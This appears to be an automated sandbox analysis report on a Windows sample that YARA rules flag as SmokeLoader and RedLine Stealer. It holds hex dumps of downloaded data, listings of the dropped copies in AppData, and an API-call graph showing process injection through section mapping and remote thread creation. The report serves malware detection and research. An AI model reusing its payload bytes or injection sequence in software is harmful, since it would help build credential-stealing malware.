                                                            2024-10-11 04:37:57 UTC8000INData Raw: 00 eb 05 a1 08 9c 41 00 83 f8 02 0f 84 cf 00 00 00 3b c3 0f 84 c7 00 00 00 83 f8 01 0f 85 e8 00 00 00 89 5d f8 39 5d 18 75 08 8b 07 8b 40 04 89 45 18 8b 35 6c 61 41 00 33 c0 39 5d 20 53 53 ff 75 10 0f 95 c0 ff 75 0c 8d 04 c5 01 00 00 00 50 ff 75 18 ff d6 8b f8 3b fb 0f 84 ab 00 00 00 7e 3c 81 ff f0 ff ff 7f 77 34 8d 44 3f 08 3d 00 04 00 00 77 13 e8 fe 04 00 00 8b c4 3b c3 74 1c c7 00 cc cc 00 00 eb 11 50 e8 66 a7 ff ff 59 3b c3 74 09 c7 00 dd dd 00 00 83 c0 08 8b d8 85 db 74 69 8d 04 3f 50 6a 00 53 e8 3a db ff ff 83 c4 0c 57 53 ff 75 10 ff 75 0c 6a 01 ff 75 18 ff d6 85 c0 74 11 ff 75 14 50 53 ff 75 08 ff 15 78 61 41 00 89 45 f8 53 e8 c9 fa ff ff 8b 45 f8 59 eb 75 33 f6 39 5d 1c 75 08 8b 07 8b 40 14 89 45 1c 39 5d 18 75 08 8b 07 8b 40 04 89 45 18 ff 75 1c
                                                            Data Ascii: A;]9]u@E5laA39] SSuuPu;~<w4D?=w;tPfY;tti?PjS:WSuujutuPSuxaAESEYu39]u@E9]u@Eu
                                                            2024-10-11 04:37:57 UTC8000INData Raw: 5b c2 8d d6 c4 27 91 8e 7e f8 55 4b 16 bb 3e a7 34 f2 53 59 d0 13 05 48 83 20 ea 11 fd 52 24 9a 51 44 bb 31 a6 b5 d9 82 77 8b 2d 89 1c c7 53 c9 5a 7f 2f 0c 50 a9 f8 43 a6 d9 80 3e d4 c7 99 1a 24 d3 f0 78 75 97 71 8e ff d2 d8 9f 5d d2 cf b8 63 23 36 f0 d6 ac 11 20 58 22 28 b5 ff dc ff 07 b3 c8 4a 31 4d 6d 3d 39 d7 12 ba d6 2b 89 5a 29 ac 60 d0 8e a9 ae f8 c5 41 86 83 fa be 1a 93 21 de 19 ae 94 38 47 fb 5e fd 56 04 2d d6 9e ba 67 71 58 5f f3 6d 74 22 0d 15 a1 31 b5 68 04 17 a8 4e 6f 90 fa a8 89 8e e1 60 7b 19 06 4e 62 46 f1 42 ff 73 f3 96 f8 7e 6b 25 99 7e 58 e2 80 e3 83 63 a0 25 55 2c 97 ed 06 e5 42 f6 20 b6 bc 26 29 62 12 1f f6 04 28 cc b1 ae 6f 07 52 c3 b0 0e 80 b5 79 35 e3 2c ce ee 73 0d c8 a0 68 e2 4b 0d 84 42 6c 36 73 a6 1d 84 88 cf 72 ff 41 6e 55 f1
                                                            Data Ascii: ['~UK>4SYH R$QD1w-SZ/PC>$xuq]c#6 X"(J1Mm=9+Z)`A!8G^V-gqX_mt"1hNo`{NbFBs~k%~Xc%U,B &)b(oRy5,shKBl6srAnU
                                                            2024-10-11 04:37:58 UTC8000INData Raw: d1 19 fe 86 90 a0 25 a8 0a 1d 53 63 bf 38 d3 3f 5c bd 65 07 81 a9 72 ab a7 78 2b da 22 53 9a 46 66 89 5a c1 eb de 3f b5 0e 88 58 ab 1b ab 39 e7 77 d7 68 ff 36 0c 85 2d 81 fb 77 b9 1f bf eb ae a5 f1 44 71 06 70 49 f4 5a 0b e6 68 9c f9 fe 86 7a 2f 21 73 da 9b bb f2 f4 d4 b8 50 25 c4 2b 74 1c ad 54 4d 4c 51 76 8e 66 a6 2a fc ae 4f 2a a2 28 79 60 84 39 1e 77 e9 2f 10 f7 ec 44 61 ca b7 a6 02 13 ab cf f6 47 3d d9 8e 28 69 3c da ac 25 46 94 5b 6b cd 0d 49 23 b3 e5 d4 a1 bb ed 36 11 50 3e 5d 1a bc 7b 62 bf 73 49 34 84 8a 01 3d 5d 7c 18 02 bc 93 ff 59 10 be 4a de bf 19 82 ef 54 ee 32 82 e1 ce a8 09 37 19 89 bd 75 8b 10 f9 d6 f2 a5 27 d6 6e 76 bc a4 28 e0 58 d6 63 46 9a cb ac 33 57 24 6f 9a a1 02 8d da 3c 2d 48 c3 ea 82 c0 56 94 eb 52 4e a2 e3 b3 c6 83 56 46 29 22
                                                            Data Ascii: %Sc8?\erx+"SFfZ?X9wh6-wDqpIZhz/!sP%+tTMLQvf*O*(y`9w/DaG=(i<%F[kI#6P>]{bsI4=]|YJT27u'nv(XcF3W$o<-HVRNVF)"
                                                            2024-10-11 04:37:58 UTC8000INData Raw: 48 d8 f9 e0 c8 ac f4 20 b9 b8 d3 96 a7 7d 2f 27 e5 24 0c 9b 93 7b 66 77 12 b1 8d fb 20 20 43 a0 34 b0 3b 3f ed f8 5b 5b 39 e1 86 63 fb 4a 52 77 9c 3a ce 37 c1 d2 e6 bb b6 44 4f 88 5b 15 8d 09 24 dd 28 aa 52 1b 7a 46 ce 51 f6 cc d3 9a a2 5a 79 03 b2 6b dc 76 17 10 67 72 7a d9 aa 22 ca 89 07 61 de 15 80 81 3a 5c 5b b8 ac 69 44 be d1 2b 5a c4 b3 f7 40 a1 dd 24 67 91 05 c7 7b 9c 62 60 73 95 8d c4 5f 5c d0 50 23 31 e7 e7 cb 18 dc 4a 57 68 28 6d 4f a9 dd ec 17 93 4e 43 31 d9 77 c0 5a a2 88 42 7d d4 fe f7 3e d4 19 74 d5 2c f0 1f 74 45 e1 ea 61 81 c6 cc 8e 53 4e e0 07 80 d7 03 9a 48 d1 86 7f 62 0d 3c 8d ee 89 af 4b 1f d3 cb 05 b2 c7 8a 97 91 30 48 ce a5 d0 cc 2d e7 47 5a 86 af 6f e4 ed eb 76 f6 df 48 34 cd 7d 32 46 0a ce 9e 0b 42 78 70 75 bb ba e4 52 78 fd ee a2
                                                            Data Ascii: H }/'${fw C4;?[[9cJRw:7DO[$(RzFQZykvgrz"a:\[iD+Z@$g{b`s_\P#1JWh(mONC1wZB}>t,tEaSNHb<K0H-GZovH4}2FBxpuRx
                                                            2024-10-11 04:37:58 UTC8000INData Raw: 0c 8f ad 78 ea f3 08 a2 54 ed ce d9 6f 4c 9c b9 47 b8 a0 57 9d 42 ff 8f 7f b2 4a 40 ac 2c 98 7a 3d 75 c8 85 5c 5d fc da 93 0a 7d 79 56 ef 2c b7 f2 b1 b5 7b 5e 56 0b 55 d9 dc 0b 78 4e 2a ec ca fb e9 23 f8 a5 9f b7 df 3c 0e 58 d9 9d 47 f8 8f 8a f1 51 7b 3f 71 c9 f0 c1 c8 53 91 8d cd d1 f9 5d b7 80 cb b0 10 48 9f 0d 81 d4 1e b1 23 04 3b 3c 2f 2c ad 5e 63 d1 1d 9c e7 ca 90 78 91 7e 40 b1 2a 6b ba d9 4b c6 3c 24 4d e3 bf 02 66 83 cd 6d fe dc a0 d8 f7 0d 73 76 fe d0 e9 ab 93 1b 8d 85 91 80 93 34 1e bd e6 6b fe 5c cf 8d d0 b5 c7 bf 62 23 7e 01 62 b2 28 31 fc 14 2c c1 27 c9 2d 9d 56 21 f0 dd 3f 71 7d 8f d1 6f 63 df 59 63 93 7e 46 27 c8 f9 12 91 6d 12 c6 6d c1 b4 55 2e ba 97 7c 8e ef ff 50 c1 e8 6e 3a 6e b1 cf e0 15 1b 78 5b 85 cf 98 dd a2 c4 be 7d 86 c2 d8 f3 02
                                                            Data Ascii: xToLGWBJ@,z=u\]}yV,{^VUxN*#<XGQ{?qS]H#;</,^cx~@*kK<$Mfmsv4k\b#~b(1,'-V!?q}ocYc~F'mmU.|Pn:nx[}
                                                            2024-10-11 04:37:58 UTC8000INData Raw: 55 4e b7 be ad de ef 30 64 ae 70 0f 52 9f 33 d0 b4 b6 ca 8f f6 7a 7c 0c 3d 0d b9 d2 00 6b 15 6a ab 88 d4 75 c5 ea b0 20 73 b0 ed 20 85 7a 09 3f 8b e3 d0 ca c5 bf 76 9b 54 a5 4a cf 3c 3e 55 9c 1c fa 43 16 2f 1d 38 e8 87 89 07 69 ae e3 e4 6c 1d 0b fa 74 e8 07 2f 71 75 db 32 d3 2f 45 c3 6a 90 c4 1e 00 bf 9e ac fe c4 9f c4 7c d2 22 12 e5 62 8d 58 3b 55 2f fb 5d 22 f4 c8 c7 ba da d0 1b c4 13 f2 83 ef 9f 0d 0e e3 63 8b e6 8a 01 68 52 65 46 56 33 4f 38 6f 3c f0 ab a6 e0 91 cc 58 0e 16 2b 8e 55 ba 7f 48 50 af 47 4d 01 45 b2 48 e0 f2 61 77 51 42 7a a4 96 e9 71 7d e1 8b e3 2f 96 bb 4e 46 4e 83 00 53 0b 28 e1 11 b5 38 70 42 a8 7d 78 23 64 3c f5 79 25 34 f7 7f 55 b1 56 d9 43 e9 4d cd b3 2c fb 8e 39 bc ce 2b fc d6 ab a4 db f6 36 71 e1 35 8d 95 d2 43 b3 1d 66 f6 4f 44
                                                            Data Ascii: UN0dpR3z|=kju s z?vTJ<>UC/8ilt/qu2/Ej|"bX;U/]"chReFV3O8o<X+UHPGMEHawQBzq}/NFNS(8pB}x#d<y%4UVCM,9+6q5CfOD
                                                            2024-10-11 04:37:58 UTC8000INData Raw: 0d 68 be 9d 64 a7 00 5f 54 0b c4 a8 68 30 65 aa 06 46 47 cf e7 30 76 33 84 c0 5e 03 2e 85 3c aa 30 83 01 29 f1 61 01 b1 09 cc fb f5 8b b5 50 9a 99 57 57 1b 58 cd e6 dd 09 47 0e 42 6c 22 6d bf 7f 14 63 f4 3f e5 7a 63 11 9e 3b 66 2b e1 65 2a 70 a9 54 e9 3c ea 5c 36 0e 47 6d dc c7 e6 da 3e d5 77 e7 03 1c f4 17 1d 52 4b ee 49 86 dc 54 eb 4d ee 53 ae 48 85 9c 4b 1d 8e 9b 79 cf 1e 5b bf 6d 66 c4 e1 17 59 1e c0 db ba 41 ba a6 bc 24 2d 7d 71 0e 44 ea 7c 73 39 60 2e 67 68 68 df bd e5 4c a6 f8 fb 19 99 d3 92 98 72 cc 91 b4 9f cd 52 26 2e 85 64 ea 3f 9b 50 e0 72 37 33 09 59 44 f9 7d 60 ae b6 03 95 62 33 b2 b8 8b 33 49 d4 10 b0 25 9d f5 32 9e 9d 53 e4 b0 7c 4e f4 98 93 f2 5f ac 9d fe 88 c4 11 c8 be 6f 75 71 1c 6b c9 26 60 da 89 14 44 5d 2d 23 c9 03 5f 6c df ce 2b 15
                                                            Data Ascii: hd_Th0eFG0v3^.<0)aPWWXGBl"mc?zc;f+e*pT<\6Gm>wRKITMSHKy[mfYA$-}qD|s9`.ghhLrR&.d?Pr73YD}`b33I%2S|N_ouqk&`D]-#_l+


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:00:36:55
                                                            Start date:11/10/2024
                                                            Path:C:\Users\user\Desktop\wBgwzVbZuV.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\wBgwzVbZuV.exe"
                                                            Imagebase:0x400000
                                                            File size:245'760 bytes
                                                            MD5 hash:A50C051C3BEB22A0F9CE8694FB4D0BAB
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1760101074.0000000002DF7000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1759796388.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1760185099.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1760185099.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1759831578.0000000002C40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1759831578.0000000002C40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:00:37:04
                                                            Start date:11/10/2024
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0x7ff72b770000
                                                            File size:5'141'208 bytes
                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:5
                                                            Start time:00:37:23
                                                            Start date:11/10/2024
                                                            Path:C:\Users\user\AppData\Roaming\wehrbbi
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\wehrbbi
                                                            Imagebase:0x400000
                                                            File size:245'760 bytes
                                                            MD5 hash:A50C051C3BEB22A0F9CE8694FB4D0BAB
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2011339150.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2011339150.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2011243889.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2011243889.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2011394897.0000000002D27000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2011202402.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 42%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:00:37:57
                                                            Start date:11/10/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\F421.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\F421.exe
                                                            Imagebase:0x400000
                                                            File size:244'736 bytes
                                                            MD5 hash:500B5F7BBE44E1C2370628C67AC45F67
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2354485892.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2354485892.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2354367271.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2354648687.0000000002DA7000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2354402356.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2354402356.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:00:38:26
                                                            Start date:11/10/2024
                                                            Path:C:\Users\user\AppData\Roaming\rghrbbi
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\rghrbbi
                                                            Imagebase:0x400000
                                                            File size:244'736 bytes
                                                            MD5 hash:500B5F7BBE44E1C2370628C67AC45F67
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2705916813.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2705916813.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2706573032.0000000002D27000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.2705859376.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2706245670.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2706245670.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:00:40:01
                                                            Start date:11/10/2024
                                                            Path:C:\Users\user\AppData\Roaming\wehrbbi
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\wehrbbi
                                                            Imagebase:0x400000
                                                            File size:245'760 bytes
                                                            MD5 hash:A50C051C3BEB22A0F9CE8694FB4D0BAB
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:10
                                                            Start time:00:40:01
                                                            Start date:11/10/2024
                                                            Path:C:\Users\user\AppData\Roaming\rghrbbi
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\rghrbbi
                                                            Imagebase:0x400000
                                                            File size:244'736 bytes
                                                            MD5 hash:500B5F7BBE44E1C2370628C67AC45F67
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:9.5%
                                                              Dynamic/Decrypted Code Coverage:29.7%
                                                              Signature Coverage:41.1%
                                                              Total number of Nodes:175
                                                              Total number of Limit Nodes:7
                                                              execution_graph 3395 402e40 3397 402e37 3395->3397 3398 402edf 3397->3398 3399 4018e6 3397->3399 3400 4018f5 3399->3400 3401 40192e Sleep 3400->3401 3402 401949 3401->3402 3404 40195a 3402->3404 3405 401514 3402->3405 3404->3398 3406 401524 3405->3406 3407 4016e0 3406->3407 3408 4015c4 NtDuplicateObject 3406->3408 3407->3404 3408->3407 3409 4015e1 NtCreateSection 3408->3409 3410 401661 NtCreateSection 3409->3410 3411 401607 NtMapViewOfSection 3409->3411 3410->3407 3413 40168d 3410->3413 3411->3410 3412 40162a NtMapViewOfSection 3411->3412 3412->3410 3414 401648 3412->3414 3413->3407 3415 401697 NtMapViewOfSection 3413->3415 3414->3410 3415->3407 3416 4016be NtMapViewOfSection 3415->3416 3416->3407 3417 415f00 3420 415b00 3417->3420 3419 415f05 3421 415b0d 3420->3421 3422 415cf7 3421->3422 3423 415be7 InterlockedCompareExchange ReadConsoleW FindAtomW GetConsoleMode SearchPathA 3421->3423 3424 415d05 SetCommState 3422->3424 3428 415d1e 3422->3428 3425 415c41 7 API calls 3423->3425 3424->3422 3426 415ce1 PulseEvent 3425->3426 3427 415ce8 3425->3427 3426->3427 3427->3422 3429 415de8 3428->3429 3430 415d2b 7 API calls 3428->3430 3443 415770 3429->3443 3437 415dcb 3430->3437 3434 415ded LoadLibraryA 3445 4157a0 GetModuleHandleW GetProcAddress VirtualProtect 3434->3445 3435 415e3d 3446 415a70 3435->3446 3437->3429 3438 415e42 3439 415e7d InterlockedDecrement 3438->3439 3440 415e93 3438->3440 3439->3438 3441 415eb2 GetFileAttributesA 3440->3441 3442 415ec2 3440->3442 3441->3440 3442->3419 3444 415778 LocalAlloc 3443->3444 3444->3434 3445->3435 3447 415a99 QueryDosDeviceW 3446->3447 3448 415aaa 3446->3448 3447->3448 3457 415930 3448->3457 3451 415ac5 3460 415970 3451->3460 3452 415abd FreeEnvironmentStringsA 3452->3451 3455 415adc HeapDestroy GetNumaProcessorNode 3456 415aee 3455->3456 3456->3438 3458 415941 FatalAppExitA GetModuleHandleA 3457->3458 3459 415953 3457->3459 3458->3459 3459->3451 3459->3452 3461 4159a5 3460->3461 3462 415994 BuildCommDCBA 3460->3462 3463 4159cf 3461->3463 3464 4159ad WritePrivateProfileStringA FreeEnvironmentStringsA 3461->3464 3462->3463 3466 415a09 SetCalendarInfoW OpenJobObjectA GetShortPathNameW 3463->3466 3467 415a3c 3463->3467 3468 415960 3463->3468 3464->3463 3466->3463 3467->3455 3467->3456 3471 4158f0 3468->3471 3472 415919 3471->3472 3473 41590c SetEvent 3471->3473 3472->3463 3473->3472 3547 2c30001 3548 2c30005 3547->3548 3553 2c3092b GetPEB 3548->3553 3550 2c30030 3555 2c3003c 3550->3555 3554 2c30972 3553->3554 3554->3550 3556 2c30049 3555->3556 3557 2c30e0f 2 API calls 3556->3557 3558 2c30223 3557->3558 3559 2c30d90 GetPEB 3558->3559 3560 2c30238 VirtualAlloc 3559->3560 3561 2c30265 3560->3561 3562 2c302ce VirtualProtect 3561->3562 3564 2c3030b 3562->3564 3563 2c30439 VirtualFree 3567 2c304be LoadLibraryA 3563->3567 3564->3563 3566 2c308c7 3567->3566 3573 401542 3574 40153b 3573->3574 3575 4015c4 NtDuplicateObject 3574->3575 3584 4016e0 3574->3584 3576 4015e1 NtCreateSection 3575->3576 3575->3584 3577 401661 NtCreateSection 3576->3577 3578 401607 NtMapViewOfSection 3576->3578 3580 40168d 3577->3580 3577->3584 3578->3577 3579 40162a NtMapViewOfSection 3578->3579 3579->3577 3581 401648 3579->3581 3582 401697 NtMapViewOfSection 3580->3582 3580->3584 3581->3577 3583 4016be NtMapViewOfSection 3582->3583 3582->3584 3583->3584 3512 2dfa0f9 3513 2dfa107 3512->3513 3514 2dfa8a7 3 API calls 3513->3514 3515 2dfa11f 3514->3515 3568 2c30005 3569 2c3092b GetPEB 3568->3569 3570 2c30030 3569->3570 3571 2c3003c 7 API calls 3570->3571 3572 2c30038 3571->3572 3585 415747 3586 415778 LocalAlloc 3585->3586 3587 41574c 3585->3587 3587->3586 3635 402dd0 3636 402ddc 3635->3636 3637 4018e6 8 API calls 3636->3637 3638 402edf 3636->3638 3637->3638 3528 4018f1 3529 4018f6 3528->3529 3530 40192e Sleep 3529->3530 3531 401949 3530->3531 3532 401514 7 API calls 3531->3532 3533 40195a 3531->3533 3532->3533 3622 401915 3623 4018c6 3622->3623 3624 40191a 3622->3624 3625 40192e Sleep 3624->3625 3626 401949 3625->3626 3627 401514 7 API calls 3626->3627 3628 40195a 3626->3628 3627->3628 3474 402f97 3475 4030ee 3474->3475 3476 402fc1 3474->3476 3476->3475 3477 40307c RtlCreateUserThread NtTerminateProcess 3476->3477 3477->3475 3478 2dfa107 3479 2dfa116 3478->3479 3482 2dfa8a7 3479->3482 3483 2dfa8c2 3482->3483 3484 2dfa8cb CreateToolhelp32Snapshot 3483->3484 3485 2dfa8e7 Module32First 3483->3485 3484->3483 3484->3485 3486 2dfa11f 3485->3486 3487 2dfa8f6 3485->3487 3489 2dfa566 3487->3489 3490 2dfa591 3489->3490 3491 2dfa5da 3490->3491 3492 2dfa5a2 VirtualAlloc 3490->3492 3491->3491 3492->3491 3639 4159d9 3640 4159e0 3639->3640 3641 415960 SetEvent 3640->3641 3642 415a09 SetCalendarInfoW OpenJobObjectA GetShortPathNameW 3640->3642 3643 415a3c 3640->3643 3641->3640 3642->3640 3612 402d7b 3615 402d38 3612->3615 3613 402dc7 3614 4018e6 8 API calls 3614->3613 3615->3612 3615->3613 3615->3614 3534 4014fe 3535 401506 3534->3535 3536 401531 3534->3536 3537 4016e0 3536->3537 3538 4015c4 NtDuplicateObject 3536->3538 3538->3537 3539 4015e1 NtCreateSection 3538->3539 3540 401661 NtCreateSection 3539->3540 3541 401607 NtMapViewOfSection 3539->3541 3540->3537 3543 40168d 3540->3543 3541->3540 3542 40162a NtMapViewOfSection 3541->3542 3542->3540 3544 401648 3542->3544 3543->3537 3545 401697 NtMapViewOfSection 3543->3545 3544->3540 3545->3537 3546 4016be NtMapViewOfSection 3545->3546 3546->3537 3493 2c3003c 3494 2c30049 3493->3494 3506 2c30e0f SetErrorMode SetErrorMode 3494->3506 3499 2c30265 3500 2c302ce VirtualProtect 3499->3500 3502 2c3030b 3500->3502 3501 2c30439 VirtualFree 3505 2c304be LoadLibraryA 3501->3505 3502->3501 3504 2c308c7 3505->3504 3507 2c30223 3506->3507 3508 2c30d90 3507->3508 3509 2c30dad 3508->3509 3510 2c30dbb GetPEB 3509->3510 3511 2c30238 VirtualAlloc 3509->3511 3510->3511 3511->3499

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 415b00-415b28 2 415b30-415b37 0->2 3 415b39-415b3b 2->3 4 415b3f-415b45 2->4 3->4 5 415b47-415b51 4->5 6 415b56-415b60 4->6 5->6 7 415b62-415b91 6->7 8 415b9b-415ba2 6->8 7->8 8->2 9 415ba4-415bac 8->9 11 415bb0-415bb6 9->11 12 415bc4-415bcb 11->12 13 415bb8-415bbe 11->13 14 415bd1-415bd8 12->14 15 415bcd 12->15 13->12 14->11 16 415bda-415be1 14->16 15->14 17 415cf7-415d03 16->17 18 415be7-415cdf InterlockedCompareExchange ReadConsoleW FindAtomW GetConsoleMode SearchPathA GetDefaultCommConfigA MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA GetSystemTimeAdjustment 16->18 19 415d05-415d13 SetCommState 17->19 22 415ce1-415ce2 PulseEvent 18->22 23 415ce8-415cf4 18->23 24 415d15-415d1c 19->24 25 415d1e-415d25 19->25 22->23 23->17 24->19 24->25 26 415de8-415df7 call 415770 25->26 27 415d2b-415de5 GetConsoleAliasesLengthW GetStringTypeExW GetComputerNameW GetTimeFormatW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType 25->27 33 415df9-415e0a 26->33 34 415e2d-415e38 LoadLibraryA call 4157a0 26->34 27->26 35 415e10-415e20 33->35 40 415e3d-415e4e call 415a70 34->40 38 415e22 35->38 39 415e28-415e2b 35->39 38->39 39->34 39->35 44 415e50-415e57 40->44 46 415e67-415e6d 44->46 47 415e59-415e63 44->47 48 415e74-415e7b 46->48 49 415e6f call 415790 46->49 47->46 52 415e8a-415e91 48->52 53 415e7d-415e84 InterlockedDecrement 48->53 49->48 52->44 55 415e93-415e9d 52->55 53->52 56 415ea0-415eb0 55->56 57 415eb2-415eb7 GetFileAttributesA 56->57 58 415ebd-415ec0 56->58 57->58 58->56 59 415ec2-415ecd 58->59 60 415ed0-415ed5 59->60 61 415ed7-415edd 60->61 62 415edf-415ee5 60->62 61->62 63 415ee7-415ef4 61->63 62->60 62->63
                                                              APIs
                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415BF2
                                                              • ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00415BFF
                                                              • FindAtomW.KERNEL32(00000000), ref: 00415C06
                                                              • GetConsoleMode.KERNEL32(00000000,00000000), ref: 00415C0E
                                                              • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415C26
                                                              • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00415C4D
                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00415C55
                                                              • GetVersionExW.KERNEL32(?), ref: 00415C62
                                                              • DisconnectNamedPipe.KERNEL32(?), ref: 00415C75
                                                              • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415CBA
                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415CC9
                                                              • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00415CD2
                                                              • PulseEvent.KERNEL32(00000000), ref: 00415CE2
                                                              • SetCommState.KERNELBASE(00000000,00000000), ref: 00415D09
                                                              • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00415D3A
                                                              • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415D4B
                                                              • GetComputerNameW.KERNEL32(?,?), ref: 00415D5F
                                                              • GetTimeFormatW.KERNEL32(00000000,00000000,?,004173C0,?,00000000), ref: 00415D9F
                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00415DA6
                                                              • GetConsoleAliasExesLengthA.KERNEL32 ref: 00415DAC
                                                              • GetBinaryType.KERNEL32(004173D8,?), ref: 00415DBE
